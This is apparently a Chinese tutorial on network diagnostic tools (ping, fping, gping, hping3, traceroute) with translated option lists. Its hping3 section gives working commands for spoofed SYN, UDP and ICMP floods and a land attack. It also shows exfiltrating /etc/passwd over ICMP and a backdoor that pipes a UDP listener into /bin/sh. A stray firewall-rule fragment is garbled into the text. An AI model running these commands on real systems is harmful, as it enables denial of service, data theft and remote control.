From： Nmap、Netcat、Hping3工具对比：

hping3 命令：

示例：Testing firewall rules with Hping3 ：

在线 ping 工具

1、ping 命令 用法

ping 命令

ping 主要是判断主机之间网络是否畅通，同时可以判断是否存活，但是如果防火墙禁用了 ICMP 报文，就是禁止 ping，就无法 ping 通，没法判断主机存活。

windows 平台 ping

Linux 平台 ping

2、fping

官网：

fping 是一个向网络主机发送 ICMP 回显探测的程序，类似于 ping，但在 ping 多个主机时性能要好得多。fping 就是 ping 的加强版，可以对一个 IP段 进行 ping 扫描。

fping 用法

fping -h 用法：fping [选项] [目标...] 探测选项： -4, --ipv4 仅 ping IPv4 地址 -6, --ipv6 仅 ping IPv6 地址 -b, --size=BYTES 发送的 ping 数据包的大小。以字节为单位（默认值：56） -B, --backoff=N 将指数退避因子设置为 N（默认值：1.5） -c, --count=N 向每个目标发送 ping 的数量。(默认 1) -f, --file=FILE 从文件中读取目标列表（ - 表示标准输入） -g, --generate 生成目标列表（仅当未指定 -f 时） （在目标列表中给出开始和结束 IP，或 CIDR 地址） （例如 fping -g 192.168.1.0 192.168.1.255 或 fping -g 192.168.1.0/24） -H, --ttl=N 设置 IP 的 TTL 值（Time To Live hops） -I, --iface=IFACE 指定网卡接口，就是从那个网卡接口发送 ping -l, --loop 循环模式：永远发送 ping -m, --all 使用所提供hostnames的所有 IP（例如 IPv4 和 IPv6），与 -A 一起使用 即 ping 目标主机的多个网口 -M, --dontfrag 设置不分片标志 -O, --tos=N 在 ICMP 数据包上设置服务类型 (tos) 标志 -p, --period=Ping 对同一个目标的ping包间隔(毫秒) (在循环和统计模式中，默认为1000) -r, --retry=N 当ping失败时，最大重试次数( 默认为3次 ) -R, --random 随机数据包数据（用于阻止链接数据压缩） -S, --src=IP 设置源IP地址 -t, --timeout=MSEC 单个目标的超时时间(毫秒) （默认值：500 毫秒，除了 -l/-c/-C，它的 -p 周期最长为 2000 毫秒） 输出选项： -a, --alive 显示活动的目标。即可ping通的目标 -A, --addr 按IP地址显示目标 -C，--vcount=N 同-c，以详细格式报告结果 -d, --rdns 按名称显示目标（强制反向 DNS 查找） -D, --timestamp 在每个输出行之前打印时间戳 -e, --elapsed 显示返回数据包经过的时间 -i, --interval=MSEC ping 数据包之间的 MSEC 间隔（默认值：10 毫秒） -n, --name 按名称显示目标（目标 IP 的反向 DNS 查找） -N, --netdata 兼容 netdata 的输出（需要 -l -Q） -o, --outage 显示累计中断时间（丢包*包间隔） -q, --quiet 安静模式(不显示每个目标或每个ping的结果) -Q, --squiet=SECS 同-q, 但是，每n秒显示信息概要 -s, --stats 打印最终统计数据 -u, --unreach 显示不可到达的目标 -v, --version 显示版本 -x, --reachable=N 显示 >=N 主机是否可达

示例：

fping -A -u -c 4 192.168.1.1 192.168.1.74 192.168.1.20 fping -a -A -g 192.168.100.0/24 fping -A www.baidu.com -m

3、gping

github：

ping 基于文本形式，缺少可读性，gping 是基于 Rust 编写可视化工具，具有动态图形化界面显示，可以实时查看网络连通情况。gping 就是带有图表的 Ping

gping 特点：

• 绘制多个主机的 ping 时间图 通过 --cmd 参数 绘制命令的执行时间 自定义颜色 Windows、Mac 和 Linux 支持

用法：gping 域名/ip

4、hping、hping3

官网：

hping、hping3 核心应用：灵活地构建 TCP、IP 数据包

Nmap 团队也开发了一款类似的工具 Nping，集成在 Nmap 的安装包中。

hping 通常被用在 web 服务，用来做压力测试使用，进行DOS攻击实验。hping3 缺点是每次只能扫描一次目标。虽然 hping 以前主要用作安全工具，但它可以在许多方面被不太关心安全性的人员用于测试网络和主机，您可以使用 hping 的一小部分内容：

• 防火墙测试 高级端口扫描 网络测试，使用不同的协议，TOS，分片 手动路径 MTU 发现 在所有支持的协议下，高级 traceroute 远程操作系统指纹 远程正常运行时间猜测 TCP/IP 协议栈审计 hping 也可以用于学习TCP/IP的学生

hping3 参数

hping3 -h
用法: hping3 host [options]
  -h  --help       显示帮助
  -v  --version    显示版本
  -c  --count      发送数据包的数目
  -i  --interval   每个数据包的时间间隔 (uX X表示微秒, 示例：-i u1000)
      --fast       等价 -i u10000 (每秒发送10个数据包)
      --faster     等价 -i u1000 (每秒发送100个数据包)
      --flood      尽最快发送数据包，不显示回复。
  -n  --numeric    数字化输出，象征性输出主机地址。
  -q  --quiet      安静模式
  -I  --interface  网卡接口 (默认是路由接口)
  -V  --verbose    详细模式
  -D  --debug      调试信息
  -z  --bind       绑定 ctrl+z 到 ttl (默认为目的端口)
  -Z  --unbind     取消绑定 ctrl+z 键
      --beep       对于接收到的每个匹配数据包蜂鸣声提示

模式 选择
  default mode     TCP     // 默认模式是 TCP
  -0  --rawip      原始 IP模式。即裸IP方式。使用 RAWSOCKET 方式。
                   在此模式下 hping 会发送带数据的IP头。
  -1  --icmp       ICMP 模式
  -2  --udp        UDP  模式
  -8  --scan       扫描 模式。示例：hping --scan 1-30,70-90 -S www.target.host                   
  -9  --listen     监听 模式

IP 模式 
  -a  --spoof      源地址欺骗。
                   伪造IP攻击，防火墙就不会记录你的真实IP，当然回应的包你也接收不到。
  --rand-dest      随机目的地址模式。详细使用 man 命令
  --rand-source    随机源地址模式。详细使用 man 命令
  -t  --ttl        设置 ttl (默认 64)
  -N  --id         设置 hping 中的 ID 值，默认随机值
  -W  --winid      使用 win* id 字节顺序。
                   使用winid模式，针对不同的操作系统。UNIX ,WINDIWS的id回应不同的，
				   选项可以让你的ID回应和WINDOWS一样。
  -r  --rel        相对id字段(估计主机流量)。更改ID的，可以让ID曾递减输出，详见HPING-HOWTO。
  -f  --frag       拆分数据包成更多的 frag。即 一个数据包 分段 成多个数据包，
                   可以测试对方或者交换机碎片处理能力，缺省16字节。(可能会通过弱的ACL限制)
  -x  --morefrag   设置更多的分段标志。大量碎片，泪滴攻击。
  -y  --dontfrag   设置不分段的标志。即发送不可恢复的IP碎片，
                   通过这个可以让你了解更多的 MTU PATH DISCOVERY。
  -g  --fragoff    设置断偏移。
  -m  --mtu        设置虚拟MTU值，如果 packet size > mtu 时，实现 --frag。
  -o  --tos        type of service (default 0x00), try --tos help
  -G  --rroute     显示路由缓存，包括 RECORD_ROUTE 选项
  --lsrr           松散源路由和路由记录
  --ssrr           严格的源路由和路由记录
  -H  --ipproto    设置 IP 协议字段，仅在 RAW IP 模式下使用

ICMP 模式
  -C  --icmptype    icmp 类型 (默认回显请求)
  -K  --icmpcode    icmp 码 (默认 0)
      --force-icmp  发送所有 icmp 类型 (默认只发送支持的类型)
      --icmp-gw     设置ICMP重定向网关。(默认0.0.0.0)    // ICMP重定向
      --icmp-ts     等同 --icmp --icmptype 13 (ICMP 时间戳)
      --icmp-addr   等同 --icmp --icmptype 17 (ICMP 地址 子网 掩码)
      --icmp-help   显示其他icmp选项帮助      // ICMP帮助

UDP/TCP 模式
  -s  --baseport   源端口 (默认随机)
  -p  --destport   [+][+]<port> 目的端口(默认 0) ctrl+z inc/dec
  -k  --keep       保持源端口。即源端口不关闭，一直处于监听状态
  -w  --win        winsize (default 64)。win的滑动窗口。windows发送字节(默认64)
  -O  --tcpoff     伪造 tcp 数据偏移量(用来代替 "tcp地址长度 / 4" )
  -Q  --seqnum     仅显示tcp序列号
  -b  --badcksum   (尝试) 发送带有错误checksum的IP数据包。                  
                   许多系统将修复发送数据包的IP校验和。
                   所以你会得到错误UDP/TCP校验和。
  -M  --setseq     设置TCP序列号 
  -L  --setack     set TCP ack ( 注意：不是设置 TCP ACK 的 flag )
  -F  --fin        set FIN flag
  -S  --syn        set SYN flag
  -R  --rst        set RST flag
  -P  --push       set PUSH flag
  -A  --ack        set ACK flag (注意：设置 TCP ACK 的 flag )
  -U  --urg        set URG flag  // 一大堆IP数据包头的设置。
  -X  --xmas       set X unused flag (0x40)
  -Y  --ymas       set Y unused flag (0x80)
  --tcpexitcode    use last tcp->th_flags as exit code
  --tcp-mss        用给定的值，启用并设置 TCP MSS
  --tcp-timestamp  启用 TCP时间戳 来猜测 HZ/uptime

用用设置
  -d  --data        数据大小 ( 默认是 0 )
  -E  --file        从文件获取数据
  -e  --sign        添加 signature
  -j  --dump        转储为16进制数据包
  -J  --print       转储为可打印字符
  -B  --safe        启用“安全”协议
  -u  --end         告诉 --file 何时到达 EOF 并阻止倒回。
  -T  --traceroute  追踪模式。( 等同 --bind and --ttl 1 )
  --tr-stop         在 追踪模式 下收到第一个不是ICMP时退出
  --tr-keep-ttl     保持源 TTL 固定，对仅监控一跳很有用
  --tr-no-rtt       不要在 traceroute 模式下计算/显示 RTT 信息
ARS 数据包描述(新增功能，不稳定的)
  --apd-send        发送用 APD 描述的数据包 (参见 docs/APD.txt)

hping3 的使用

hping3 -c 5000 -d 150 -S -w 64 -p 81 --flood 1.1.1.1 ----- 打400M TCP SYN流量 hping3 -c 999999999 -d 150 -S -w 64 -p 81 -i u1000 1.1.1.1 ---- 打1.5M TCP SYN流量 hping3 -c 999999999 -d 150 -w 64 -p 81 -i u10 1.1.1.1 -2 ---- 组合限速，打100M UDP流量

防火墙测试

参考： 使用 Hping3 指定各种数据包字段，依次对防火墙进行详细测试。测试防火墙对ICMP包的反应、是否支持traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击（DoS attack）。例如，以LandAttack 方式测试目标防火墙（ Land Attack 是将发送源地址设置为与目标地址相同，诱使目标机与自己不停地建立连接 ）。

hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10

端口扫描

Hping3 也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。以下示例可用于探测目标机的80端口是否开放：

hping3 -I eth0 -S -p 80 -c 5 192.168.1.107 # 端口扫描

其中-I eth0 指定使用eth0端口，-S 指定TCP包的标志位SYN，-p 80指定探测的目的端口。

hping3 支持非常丰富的端口探测方式，nmap 拥有的扫描方式 hping3 几乎都支持（除开 connect方式，因为 Hping3 仅发送与接收包，不会维护连接，所以不支持 connect 方式探测）。而且Hping3 能够对发送的探测进行更加精细的控制，方便用户微调探测结果。当然，Hping3 的端口扫描性能及综合处理能力，无法与 Nmap 相比。一般使用它仅对少量主机的少量端口进行扫描。

Idle 扫描

该扫描原理是：寻找一台idle主机（该主机没有任何的网络流量，并且IPID是逐个增长的），攻击端主机先向idle主机发送探测包，从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包（此处假设为SYN包），此时如果远程主机的目的端口开放，那么会回复SYN/ACK，此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包，获取其IPID。那么对比两次的IPID值，我们就可以判断远程主机是否回复了数据包，从而间接地推测其端口状态。

DoS 攻击方法

使用 Hping3 可以很方便构建拒绝服务攻击。比如对目标机发起大量SYN连接，伪造源地址为192.168.10.99，并使用 1000 微秒的间隔发送各个SYN包。

hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000

其他攻击如 smurf、teardrop、land attack 等也很容易构建出来。

随机 源IP 的 Dos 攻击

hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com hping3 -S -U --flood -V --rand -source IP -c 100000 发送数据包的数量 -d 120 发送数据包的大小 -S 只发送SYN 数据包 -w 64 TCP window的大小. -p 21 目的端口号 --flood 尽可能快的发送，不显示回显。 --rand-source 使用随机的Source IP Addresses 或者使用 -a or spoof to hide hostnames

ICMP flood

ICMP 的泛洪攻击是在最小时间内发送最大的ICMP数据到目标机，例如使用ping指令。在"旧"时代它使用一个巨大的ping（死亡之ping）是可能破坏机器，希望这些时间已经过去，但它仍有可能攻击任何机器的带宽和处理时间，如果接受到这种ICMP数据包。

命令：hping3 -q -n -a 10.0.0.1 --id 0 --icmp -d 56 --flood 192.168.0.2 -q 表示quiet, -n 表示无 name resolving, id 0 表示有ICMP echo request (ping) -d i表示包的大小 (56 is the normal size for a ping). 某些系统配置中自动地丢弃这种通过hping生成的头部设定不正确的ICMP包（例如不可能设置带顺序的ID）。在这种情况下，您可以使用Wireshark嗅探正常的ICMP回显请求报文，将其保存为二进制文件，并使用hping3重播。 示例：hping3 -q -n --rawip -a 10.0.0.1 --ipproto 1 --file "./icmp_echo_request.bin" -d 64 --flood 192.168.0.2

UDP flood

命令：hping3 -q -n -a 10.0.0.1 --udp -s 53 --keep -p 68 --flood 192.168.0.2 对于UDP，你必须精确的知道源和目的端口，这里我选择了DNS和BOOTPC（的dhclient）端口。该BOOTPC（68）端口经常在个人电脑开着，因为大多数人使用DHCP来自己连接到网络。 ame blacklist_180 --set -m comment --comment"Blacklist source IP" -j DROP

SYN flood

SYN泛洪是最常用的扫描技术，以及这样做的原因是因为它是最危险的。 SYN泛洪在于发送大量的TCP数据包只有SYN标志。因为SYN报文用来打开一个TCP连接，受害人的主机将尝试打开这些连接。这些连接，存储的连接表中，将继续开放一定的时间，而攻击者不断涌入与SYN数据包。一旦受害者的连接表被填满时，它不会接受任何新的连接，因此，如果它是一个服务器这意味着它已不再被任何人访问。 示例：hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 22 --flood 192.168.0.2

其他 SYN flood 攻击

有许多使用TCP泛洪的可能性。如你所愿刚才设置的各种TCP标志。某些TCP泛洪技术包括制定了很多不寻常的标志扰乱。例如与SARFU扫描 示例：hping3 -q -n -a 10.0.0.1 -SARFU -p 22 --flood 192.168.0.2

Land 攻击

Land 攻击原理是：用一个特别打造的SYN包，它的原地址和目标地址都被设置成某一个服务器地址。此举将导致接受服务器向它自己的地址发送SYN-ACK消息，结果这个地址又发回ACK消息并创建一个空连接。被攻击的服务器每接收一个这样的连接都将保留，直到超时，对Land攻击反应不同，许多UNIX实现将崩溃，NT变的极其缓慢(大约持续5分钟)

nmap 扫描 确定开放端口

Network Mapper，是Linux下的一个网络连接端扫描软件，用来扫描网上电脑开放的网络连接端。确定哪些服务运行在哪些连接端，并且推断计算机运行哪个操作系统

nmap v sA n www.yourorg.com oA firewallaudit

ARP攻击 / ARP欺骗

工具： ettercap

文件传输

Hping3 支持通过 TCP/UDP/ICMP 等包来进行文件传输。相当于借助 TCP/UDP/ICMP 包建立隐秘隧道通讯。实现方式是开启监听端口，对检测到的签名（签名为用户指定的字符串）的内容进行相应的解析。

在接收端开启服务，监听 ICMP 包中的签名，根据签名解析出文件内容。 hping3 192.168.1.159 --listen signature --safe --icmp 在发送端使用签名打包的ICMP包发送文件： hping3 192.168.1.108 --icmp -d 100 --sign signature --file /etc/passwd 将 /etc/passwd 密码文件通过 ICMP 包传给 192.168.10.44 主机。 发送包大小为100字节（-d 100），发送签名为 signature (-sign signature)。

木马功能

如果 Hping3 能够在远程主机上启动，那么可以作为木马程序启动监听端口，并在建立连接后打开shell通信。与netcat的后门功能类似。

示例：本地打开53号UDP端口（DNS解析服务）监听来自192.168.10.66主机的包含签名为signature的数据包，并将收到的数据调用/bin/sh执行。

当然这里只是简单的演示程序，真实的场景，控制端可以利益shell执行很多的高级复杂的操作。

在木马启动端： hping3 192.168.10.66 --listen signature --safe --udp -p 53 | /bin/sh 在远程控制端： echo ls > test.cmd hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd 将包含ls命令的文件加上签名 signature 发送到192.168.10.44主机的53号UDP端口，包数据长度为100字节。

5、tracert、traceroute

traceroute 是用来追踪出送数据包的主机到目标主机之间所经过的网关的工具。其实就是追踪路由的工具。通过 traceroute 可以知道信息从你的计算机到互联网另一端的主机是走的什么路径。当然每次数据包由某一同样的出发点（source）到达某一同样的目的地(destination)走的路径可能会不一样，但基本上来说大部分时候所走的路由是相同的。

traceroute 通过发送小的数据包到目的设备直到其返回，来测量其需要多长时间。一条路径上的每个设备 traceroute 要测3次。输出结果中包括每次测试的时间(ms)和设备的名称（如有的话）及其IP地址。

Windows 命令：tracert

linux 命令：traceroute

用法：traceroute [ -46dFITnreAUDV ] [ -f first_ttl ] [ -g gate,... ] [ -i device ] [ -m max_ttl ] [ -N squeries ] [ -p port ] [ -t tos ] [ -l flow_label ] [ -w MAX,HERE,NEAR ] [ -q nqueries ] [ -s src_addr ] [ -z sendwait ] [ --fwmark=num ] host [ packetlen ]

帮助：traceroute --help

选项：
  -4                    使用 IPv4
  -6                    使用 IPv6
  -d --debug            启用套接字级调试
  -F --dont-fragment    不分片数据包
  -f first_ttl --first=first_ttl    从 first_ttl 跃点开始（而不是从 1 开始）
  -g gate,...  --gateway=gate,...   通过指定的网关发送数据包（IPv4 最多8个，IPv6 最多 127 个）
  -I --icmp                         使用 ICMP ECHO 进行跟踪
  -T --tcp                          使用 TCP SYN 进行跟踪（默认端口为 80）
  -i device  --interface=device     指定要使用的网络接口
  -m max_ttl --max-hops=max_ttl     设置最大跳数（最大 TTL 为到达）。默认值为 30
  -N squeries  --sim-queries=squeries 设置尝试的探测次数（默认为 16）
  -n                                  不将 IP 地址解析为其域名  
  -p port --port=port    设置要使用的目标端口。 
                         要么是 默认 方法的初始 udp 端口值（每个探针递增，默认值为 33434），
						 要么是 icmp 的初始 seq（也递增，默认从 1），
						 或者其他方法的某个恒定目标端口（使用 tcp 默认为 80，udp 默认为 53，等等）
  -t tos --tos=tos       设置 TOS (即 IPv4 服务类型) 或 TC（Pv6 traffic class）传出数据包的值
  -l flow_label --flowlabel=flow_label    对 IPv6 数据包使用指定的 flow_label
  -w MAX,HERE,NEAR --wait=MAX,HERE,NEAR   等待探测的时间不超过 HERE（默认 3）倍于来自同一跃点的响应，
                                          或不超过 NEAR（默认 10）倍于某个下一跃点，
                                          或 MAX（默认 5.0）秒（也允许浮点值） )                        
  -q nqueries --queries=nqueries     设置每跳的探测数。默认为 3
  -r                                 绕过正常路由，直接发送到连接网络上的主机
  -s src_addr --source=src_addr      将源 src_addr 用于传出数据包
  -z sendwait  --sendwait=sendwait   探测之间的最小时间间隔（默认 0）。 
                                     如果该值大于 10，则它指定一个以毫秒为单位的数字，
                                     否则它是一个秒数（也允许浮点值）                              
  -e --extensions         显示 ICMP 扩展（如果存在），包括 MPLS
  -A --as-path-lookups    在路由注册表中执行 AS 路径查找，并在对应地址后直接打印结果
  -M name --module=name   使用指定的模块（内置或外部）进行跟踪路由操作。 
                          大多数方法都有它们的快捷方式（`-I 表示 `-M icmp 等）
  -O OPTS,...  --options=OPTS,...
                              使用特定模块的 OPTS 选项来跟踪路由模块。
							  允许多个 OPTS，OPTS之间用逗号分隔。
                              如果 OPTS 是 help，则打印 options 的帮助信息。
  --sport=num                 将源端口号用于传出数据包。等同 -N 1
  --fwmark=num                为传出数据包设置防火墙标记
  -U  --udp                   使用 UDP 到特定端口进行跟踪路由（而不是增加每个探测的端口），默认端口为 53
  -UL                         使用 UDPLITE 进行跟踪路由（默认目标端口是 53)
  -D --dccp                   使用 DCCP 请求进行跟踪路由（默认端口是 33434)
  -P prot --protocol=prot     使用 protocol prot 的原始数据包进行tracerouting
  --mtu                       Discover MTU along the path being traced. 等同 -F -N 1
  --back              猜测反向路径的跳数和，如果不同则打印
  -V --version        打印版本信息并退出
  --help              阅读此帮助并退出

参数:
+     host          要追踪的数据
      packetlen     完整的数据包长度（默认为 IP 标头长度加上 40）。 可以忽略或增加到最小允许值

示例：

traceroute www.baidu.com # 查看我们访问百度经过的网关 traceroute -d www.baidu.com # 访问百度并且不将地址解析成主机名。